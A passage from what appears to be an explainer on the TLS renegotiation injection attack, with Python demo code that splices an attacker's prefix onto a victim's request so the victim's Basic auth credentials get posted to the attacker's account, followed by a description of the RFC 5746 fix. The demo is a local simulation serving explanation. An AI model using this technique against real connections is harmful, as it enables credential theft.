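                  b"Host: twitter.com\r\n"
                  b"Authorization: Basic dmljdGltOmh1bnRlcjI=\r\n"   # victim:hunter2
                  b"Content-Length: 18\r\n"
                  b"\r\n"
                  b"status=hello+world")


def splice_and_serve(prefix, client_bytes):
    """The server application sees one byte stream: prefix + client data."""
    return parse_http_request(prefix + client_bytes)


def run_demo():
    """Returns (who the server thinks sent the request, the body it will post)."""
    prefix = attacker_prefix(b"YXR0YWNrZXI6cGFzcw==", 7 + len(VICTIM_REQUEST))   # attacker:pass
    request_line, headers, body = splice_and_serve(prefix, VICTIM_REQUEST)
    return headers["authorization"], body
```

The server authenticates the spliced request as the attacker, and the whole of the victim's request, Authorization header included, becomes the `status` value posted to the attacker's account. The fix (RFC 5746) cryptographically binds a renegotiation to the connection it extends, so the two halves of the stream can no longer come from different parties.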